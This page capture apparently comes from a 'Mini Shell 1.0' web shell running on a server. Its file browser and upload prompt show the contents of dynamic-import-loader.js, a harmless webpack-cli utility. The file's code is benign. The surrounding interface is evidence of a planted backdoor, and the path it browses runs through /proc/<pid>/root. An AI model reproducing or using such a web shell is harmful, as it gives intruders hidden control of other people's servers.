HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/node_modules/webpack-cli/lib/utils/
Upload File :
Current File : //proc/1784574/root/usr/share/node_modules/webpack-cli/lib/utils/dynamic-import-loader.js
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
function dynamicImportLoader() {
    let importESM;
    try {
        importESM = new Function("id", "return import(id);");
    }
    catch (e) {
        importESM = null;
    }
    return importESM;
}
module.exports = dynamicImportLoader;